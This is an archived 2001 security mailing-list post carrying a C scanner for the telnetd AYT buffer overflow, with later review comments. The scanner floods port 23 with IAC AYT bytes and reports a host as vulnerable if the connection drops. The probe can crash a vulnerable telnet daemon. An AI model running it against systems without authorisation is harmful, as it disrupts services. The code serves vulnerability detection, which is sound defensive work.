Date: Wed, 25 Jul 2001 20:50:31 +0200
From: info <[email protected]>
To: [email protected]
Subject: Telnetd AYT overflow scanner
--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="SPtelnetAYT.c"
/*
* Telnetd AYT overflow scanner, by Security Point(R)
* Bug found by scut of TESO Security
*
* Date: 25/07/01
* Author: Security Point(R)
* WWW: http://www.secpoint.com
* Email: [email protected]
*
* This program checks for the AYT overflow related to the
* newly discovered telnetd vulnerabilities.
*
* Tested against:
* Vulnerable:
* netkit-telnet-0.10
* FreeBSD 4.2
* Not vulnerable:
* netkit-telnet-0.17
*
* Please keep us updated with the OSes that you check, and
* report back to us at [email protected] whether the system
* is vulnerable or not, so that we can construct a full list
* of vulnerable systems.
*
*
* This source code is for educational purpose ONLY,
* Security Point(R) will not be responsible for any damages
* whatsoever that have a connection with this code. There are
* no warranties with regard to this information.
*
* Are your networks under attack at this moment?
*
* With Security Point(R) Scanner you can find and repair the
* Vulnerabilities before the bad guys get in.
*
* Please see http://www.secpoint.com/solutions.php
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>
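/* Spare IPv4 address object; not referenced by the code shown in this file. */
struct in_addr addr;

/* Destination socket address (family, port and IPv4 address) set up in main(). */
struct sockaddr_in address;

/* Result of the gethostbyname() lookup; points into resolver-owned storage. */
struct hostent *host;

/* Descriptor of the TCP connection to the probed host. */
int sock;

/* Outgoing probe data: room for 5120 two-byte telnet command pairs. */
char sendbuffer[5120 * 2];

/* Receive buffer for whatever the server sends back. */
char buffer[5120 * 2];

/* General-purpose loop counter. */
int i;

/*
 * Set to 1 by handle_alarm() when SIGALRM fires.  It is written from a
 * signal handler, so it has to be volatile sig_atomic_t: with a plain int
 * the compiler may cache the value and the main flow may never see the
 * update.
 */
volatile sig_atomic_t timeout;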
/*
 * SIGALRM handler.
 *
 * Cancels any alarm that is still pending and records in the global
 * `timeout` flag that the timer fired.  The signal number is not used.
 */
void handle_alarm(int signum)
{
    (void)signum;

    alarm(0);
    timeout = 1;
}
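/*
 * Check one telnet daemon for the AYT option-handling overflow.
 *
 * Usage: <program> <host>
 *
 * Connects to TCP port 23 on <host>, reads the server's opening bytes,
 * sends sendbuffer filled with IAC AYT (0xff 0xf6) pairs and waits for a
 * reply.  A connection that closes or fails after the probe is reported
 * as "vulnerable", any reply as "not vulnerable".
 *
 * The verdict is a heuristic: a closed connection is only indirect
 * evidence, so a positive result should be confirmed against the
 * installed telnetd version.  Cases where the probe could not be
 * delivered, or where the wait timed out, are reported as inconclusive
 * instead of being counted as vulnerable.
 *
 * Exits with EXIT_SUCCESS once a verdict has been printed and with
 * EXIT_FAILURE on usage, lookup, socket or delivery errors.
 */
int main(int argc, char *argv[])
{
    ssize_t got;
    ssize_t sent;
    size_t pos;

    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc != 2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);

    host = gethostbyname(argv[1]);
    if (host == NULL) {
        /*
         * gethostbyname() reports through h_errno, not errno, so perror()
         * would print an unrelated message.  The original also exited
         * with status 0 here, which hid the failure from callers.
         */
        fprintf(stderr, "gethostbyname: cannot resolve %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    /* Only copy an address that really is IPv4-sized into sin_addr. */
    if (host->h_addrtype != AF_INET ||
        host->h_length != (int)sizeof(address.sin_addr) ||
        host->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname: no IPv4 address for %s\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    memset(&address, 0, sizeof(address));
    memcpy(&address.sin_addr, host->h_addr_list[0], sizeof(address.sin_addr));
    address.sin_family = AF_INET;
    address.sin_port = htons(23); /* telnet */

    if (connect(sock, (struct sockaddr *)&address, sizeof(address)) < 0) {
        perror("connect");
        exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n");
    printf("Sending telnet options... stand by...\n");

    /*
     * NOTE(review): where signal() installs restarting handlers, read()
     * is resumed after SIGALRM and the 60 second limit has no effect --
     * confirm the behaviour on the build platform.
     */
    signal(SIGALRM, handle_alarm);

    /*
     * Fill the buffer with IAC AYT pairs by index.  The original appended
     * with sprintf(sendbuffer, "%s...", sendbuffer), which is undefined
     * (source and destination overlap), quadratic, and wrote a NUL one
     * byte past the end of sendbuffer on the last iteration.
     */
    for (pos = 0; pos + 1 < sizeof(sendbuffer); pos += 2) {
        sendbuffer[pos] = (char)0xff;     /* IAC */
        sendbuffer[pos + 1] = (char)0xf6; /* AYT */
    }

    /* Wait for the server's opening bytes before sending anything. */
    timeout = 0;
    alarm(60);
    got = read(sock, buffer, sizeof(buffer));
    alarm(0);
    if (got <= 0) {
        /* Nothing was sent yet, so a closed connection proves nothing. */
        printf("No data from %s before the probe, result inconclusive\n",
               argv[1]);
        exit(EXIT_FAILURE);
    }

    /* The buffer is not NUL-terminated any more, so pass its size. */
    sent = write(sock, sendbuffer, sizeof(sendbuffer));
    if (sent != (ssize_t)sizeof(sendbuffer)) {
        printf("Probe not fully sent to %s, result inconclusive\n", argv[1]);
        exit(EXIT_FAILURE);
    }

    memset(buffer, 0, sizeof(buffer));
    timeout = 0;
    alarm(60);
    got = read(sock, buffer, sizeof(buffer));
    alarm(0);

    if (got <= 0 && timeout) {
        /* A silent server is not the same as one that dropped the link. */
        printf("No reply from %s within the timeout, result inconclusive\n",
               argv[1]);
        exit(EXIT_FAILURE);
    }
    if (got <= 0) {
        printf("Telnetd on %s vulnerable\n", argv[1]);
        exit(EXIT_SUCCESS);
    }
    printf("Telnetd on %s not vulnerable\n", argv[1]);
    exit(EXIT_SUCCESS);
}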
--nVMJ2NtxeReIH9PS--